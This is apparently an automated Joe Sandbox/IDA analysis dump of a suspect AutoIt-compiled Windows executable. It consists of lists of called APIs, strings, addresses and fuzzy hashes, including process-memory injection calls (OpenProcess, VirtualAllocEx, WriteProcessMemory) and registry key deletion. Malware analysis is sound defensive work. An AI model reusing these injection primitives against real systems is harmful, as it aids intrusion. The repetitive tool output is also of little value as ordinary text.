                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0056C1F7
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0056C20E
                                                                      • MessageBeep.USER32(00000000), ref: 0056C226
                                                                      • KillTimer.USER32(?,0000040A), ref: 0056C242
                                                                      • EndDialog.USER32(?,00000001), ref: 0056C25C
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 005113BF
                                                                      • StrokeAndFillPath.GDI32(?,?,0054B888,00000000,?), ref: 005113DB
                                                                      • SelectObject.GDI32(?,00000000), ref: 005113EE
                                                                      • DeleteObject.GDI32 ref: 00511401
                                                                      • StrokePath.GDI32(?), ref: 0051141C
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      APIs
                                                                        • Part of subcall function 00530DB6: std::exception::exception.LIBCMT ref: 00530DEC
                                                                        • Part of subcall function 00530DB6: __CxxThrowException@8.LIBCMT ref: 00530E01
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 00517A51: _memmove.LIBCMT ref: 00517AAB
                                                                      • __swprintf.LIBCMT ref: 00522ECD
                                                                      Strings
                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00522D66
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                      APIs
                                                                        • Part of subcall function 00514750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00514743,?,?,005137AE,?), ref: 00514770
                                                                      • CoInitialize.OLE32(00000000), ref: 0057B9BB
                                                                      • CoCreateInstance.OLE32(005A2D6C,00000000,00000001,005A2BDC,?), ref: 0057B9D4
                                                                      • CoUninitialize.OLE32 ref: 0057B9F1
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                      • String ID: .lnk
                                                                      APIs
                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0056B4BE
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container$%Z
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 005350AD
                                                                        • Part of subcall function 005400F0: __87except.LIBCMT ref: 0054012B
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ErrorHandling__87except__start
                                                                      • String ID: pow
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: 3cR$_R
                                                                      APIs
                                                                        • Part of subcall function 005714BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00569296,?,?,00000034,00000800,?,00000034), ref: 005714E6
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0056983F
                                                                        • Part of subcall function 00571487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 005714B1
                                                                        • Part of subcall function 005713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00571409
                                                                        • Part of subcall function 005713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0056925A,00000034,?,?,00001004,00000000,00000000), ref: 00571419
                                                                        • Part of subcall function 005713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0056925A,00000034,?,?,00001004,00000000,00000000), ref: 0057142F
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005698AC
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005698F9
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0059F910,00000000,?,?,?,?), ref: 005979DF
                                                                      • GetWindowLongW.USER32 ref: 005979FC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00597A0C
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: e260bd272ba90578ccf462569718aa0a546675d2022bd38be7c33a0b52ed2fdd
                                                                      • Instruction ID: ba6a6223cfaf617f78dc4a74a09f3912a26e95649249b3c2ec03a577b27c0444
                                                                      • Opcode Fuzzy Hash: e260bd272ba90578ccf462569718aa0a546675d2022bd38be7c33a0b52ed2fdd
                                                                      • Instruction Fuzzy Hash: C2318B3121460AABEF118E38DC45BEA7BA9FB49324F244726F875E22E0D731E9519B50
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00597461
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00597475
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00597499
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: f122851bfe09c237bab6274e90fee95f4282485f777adaea1c9d62d8e38b1419
• Instruction ID: 75d40666cffe7914d4a3b267c603ffb01416f7211ca42accc7362bd87a9e8c99
• Opcode Fuzzy Hash: f122851bfe09c237bab6274e90fee95f4282485f777adaea1c9d62d8e38b1419
• Instruction Fuzzy Hash: 3A21E132110219ABDF118E94DC46FEA3F69FB4C724F110115FE186B1D1DAB5AC50DBA0
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00597C4A
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00597C58
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00597C5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: 34b40df7344b0ed5353c2ee24ea84b053a9422e99b7127e3b93482a4791491f6
• Instruction ID: e1ec7dcb22be8cf4eaedb7e05406ba81941af5ed8a86342c36a702d20fedb22d
• Opcode Fuzzy Hash: 34b40df7344b0ed5353c2ee24ea84b053a9422e99b7127e3b93482a4791491f6
• Instruction Fuzzy Hash: 30218EB1614209AFEB10DF28DCC5DA63BEDFF5A394B54045AFA019B3A1DB31EC119B60
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00596D3B
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00596D4B
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00596D70
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: dd34c40ccc4f8cea90db04146fb76ff13578a5ff2bc59b1f136bb87330228c7b
• Instruction ID: 2596f720f4735d94e5e58175e8dd6752da39e2455ca856aa6030edf4da94f1a1
• Opcode Fuzzy Hash: dd34c40ccc4f8cea90db04146fb76ff13578a5ff2bc59b1f136bb87330228c7b
• Instruction Fuzzy Hash: 6B21C232600218BFEF118F54DC45FAB3BBAFF89750F018129F9549B1A0C6719C5597A0
APIs
• __snwprintf.LIBCMT ref: 00583A66
  • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d$%Z
• API String ID: 3506404897-1529431106
• Opcode ID: 78a7636e9097af940b61afe803d2c04bd034aa507bd43427b59e1eca72b52ac5
• Instruction ID: 04a8db3839bb159c2cd25a1a04b021471066fadad4e2bc092758aa677b71ea52
• Opcode Fuzzy Hash: 78a7636e9097af940b61afe803d2c04bd034aa507bd43427b59e1eca72b52ac5
• Instruction Fuzzy Hash: 6C21523160011AAECF14EFA4CC85EEE7FB5BF88700F544459E955A7141DB34EA45CBA1
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00597772
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00597787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00597794
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: a1322a61d3729729657cd188298f3b5db604c887f0ca63b709a8a1ddd900efb9
• Instruction ID: 383ae0d29ab93ce925524734b50eba1cdeefdeeff1f9b91dfb27f5daf8b1bdfe
• Opcode Fuzzy Hash: a1322a61d3729729657cd188298f3b5db604c887f0ca63b709a8a1ddd900efb9
• Instruction Fuzzy Hash: BC113A72214209BFEF245FA0CC05FE73B68FF8CB54F110119F64192090D271E811DB10
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: __calloc_crt
• String ID: \$@B]
• API String ID: 3494438863-1004341647
• Opcode ID: a658caff3b3bc389c817cd5874b6c756e9f6d8ee29e6c902db551db748f92bbc
• Instruction ID: cff2062f4c8069cd433280833e2d65a2ca1113495ac73d3974113a1d2eb5c60e
• Opcode Fuzzy Hash: a658caff3b3bc389c817cd5874b6c756e9f6d8ee29e6c902db551db748f92bbc
• Instruction Fuzzy Hash: 4AF04475205612ABE7758F54BC66B626FD5F760770F50441FE100DE190FB7098495AC4
APIs
• __lock.LIBCMT ref: 00539B94
  • Part of subcall function 00539C0B: __mtinitlocknum.LIBCMT ref: 00539C1D
  • Part of subcall function 00539C0B: EnterCriticalSection.KERNEL32(00000000,?,00539A7C,0000000D), ref: 00539C36
• __updatetlocinfoEx_nolock.LIBCMT ref: 00539BA4
  • Part of subcall function 00539100: ___addlocaleref.LIBCMT ref: 0053911C
  • Part of subcall function 00539100: ___removelocaleref.LIBCMT ref: 00539127
  • Part of subcall function 00539100: ___freetlocinfo.LIBCMT ref: 0053913B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
• String ID: 8\$8\
• API String ID: 547918592-2136511422
• Opcode ID: 37c557f391aae77036ca0de2e9957841e0701210738cd79703e5d12703cac704
• Instruction ID: 02b5133d1d1f922257f725012c5852dfbd2f3839b30bcfd64d9dbfc9b6638d3c
• Opcode Fuzzy Hash: 37c557f391aae77036ca0de2e9957841e0701210738cd79703e5d12703cac704
• Instruction Fuzzy Hash: 4AE08CB2947706AEEA14FBE4690BF28AF90BB80B29F20215EF045661C1CEB40C00CA57
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00514BD0,?,00514DEF,?,005D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00514C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514C23
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
• Opcode ID: 2d01fd24c5cd890299f34f6bd4115020d0a43ea2f574b03f976659def3e1e036
• Instruction ID: a925a611a439bdc8fd07406c2dd48b1c286acac2d76e96e40b0f80dee3905cee
• Opcode Fuzzy Hash: 2d01fd24c5cd890299f34f6bd4115020d0a43ea2f574b03f976659def3e1e036
• Instruction Fuzzy Hash: 6CD01230511713CFD7205FB1D908A46BED5FF19355B118C3E9485D6160E6B0D8C0DB90
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00514B83,?), ref: 00514C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514C56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
• Opcode ID: a31d90bde56b738bf20a6dac4cf8b83feb5e62395602027acd369c6de8dce5ae
• Instruction ID: 0b499166ca057132b72608373f9f3e6f7bf19a3b6fecdd72bc780d3f132d6a72
• Opcode Fuzzy Hash: a31d90bde56b738bf20a6dac4cf8b83feb5e62395602027acd369c6de8dce5ae
• Instruction Fuzzy Hash: FDD01730610713CFEB209F71D91864A7BE5BF15355B22883E9496DA160E770D8C0DBA0
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00591039), ref: 00590DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00590E07
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: 50c1736a9b697cb412a36de67a3fe08d3e05c33352ee6d4623d495448b9263f7
• Instruction ID: 9f647a9bb4e2d54ac79dc738be110d9c4cd839ea68090b648a156e82ab794538
• Opcode Fuzzy Hash: 50c1736a9b697cb412a36de67a3fe08d3e05c33352ee6d4623d495448b9263f7
• Instruction Fuzzy Hash: B6D01770510722CFDB209FB5D908B867AE9BF15352F129C7E9486D61A0EAB0D890DB90
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00588CF4,?,0059F910), ref: 005890EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00589100
Strings
Memory Dump Source
• Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
                                                                      • Opcode ID: 9390c73698705900c93db7ee9fc8a508a50386dd905c3918ca8f647620b1b197
                                                                      • Instruction ID: a863bf9e85c1998ce202afb68ad606ef4a5beb9b37052a179cf25a4e84bbe99e
                                                                      • Opcode Fuzzy Hash: 9390c73698705900c93db7ee9fc8a508a50386dd905c3918ca8f647620b1b197
                                                                      • Instruction Fuzzy Hash: D7D01734614723CFDB20AF71D81C6167AE5BF15351B16883E9886E65A0EB74C880DBA0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime__swprintf
                                                                      • String ID: %.3d$WIN_XPe
                                                                      • API String ID: 2070861257-2409531811
                                                                      • Opcode ID: 3d12bfd26e948f5de41f8dc0e14027db9df9ded1bb1e06080c781dd1ddb49f43
                                                                      • Instruction ID: 302cf8c614a4e64d67159b45b45b5da14124e89c6c96c7f781971666074d1966
                                                                      • Opcode Fuzzy Hash: 3d12bfd26e948f5de41f8dc0e14027db9df9ded1bb1e06080c781dd1ddb49f43
                                                                      • Instruction Fuzzy Hash: C4D01271854509FACB0097949C99EF97F7CF71C302F141853B806D2040E2219B98E625
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3a4c15cee9f04fe76346e12e3dc5269c30224c163e1d17954017e7b20e24a5b1
                                                                      • Instruction ID: 03840de7b15387617d623118f1b3c24f0bf8b83ce49522bce44d60f14f4cc54c
                                                                      • Opcode Fuzzy Hash: 3a4c15cee9f04fe76346e12e3dc5269c30224c163e1d17954017e7b20e24a5b1
                                                                      • Instruction Fuzzy Hash: D2C16174A0421AEFCB14CFA4C884EAEBBB5FF48718B158999E805DB351DB30DD81DB90
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0058E0BE
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0058E101
                                                                        • Part of subcall function 0058D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058D7C5
                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0058E301
                                                                      • _memmove.LIBCMT ref: 0058E314
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                      • String ID:
                                                                      • API String ID: 3659485706-0
                                                                      • Opcode ID: 3003efefbd41906f702a8c0b0ed1882f07f4b0a7962c2a4b177f25d440244d13
                                                                      • Instruction ID: 5a86fc2b4d4eb4ab969c840d239b050702aa33da22dc7311a434b9f89c52a85a
                                                                      • Opcode Fuzzy Hash: 3003efefbd41906f702a8c0b0ed1882f07f4b0a7962c2a4b177f25d440244d13
                                                                      • Instruction Fuzzy Hash: 62C147716083019FC704EF28C495A6ABBF4FF89714F04896DF89A9B351D731E946CB82
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 005880C3
                                                                      • CoUninitialize.OLE32 ref: 005880CE
                                                                        • Part of subcall function 0056D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0056D5D4
                                                                      • VariantInit.OLEAUT32(?), ref: 005880D9
                                                                      • VariantClear.OLEAUT32(?), ref: 005883AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 780911581-0
                                                                      • Opcode ID: 928a294d015874d7110a58b671024556719d6de003db1664dd35d75cff462d3d
                                                                      • Instruction ID: d25ab53b845eaf59c531254fa85ada4cf430255d9cc798fcfb9531b4fb07be9f
                                                                      • Opcode Fuzzy Hash: 928a294d015874d7110a58b671024556719d6de003db1664dd35d75cff462d3d
                                                                      • Instruction Fuzzy Hash: 0EA16B356047029FDB10EF14C895B6ABBE4FF89714F544858F996AB3A1CB30ED45CB82
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                      • String ID:
                                                                      • API String ID: 2808897238-0
                                                                      • Opcode ID: 035e6db40586c1b04eb658ae6695d2447a8bdee217e5072e9c4e48a46cbf4eb5
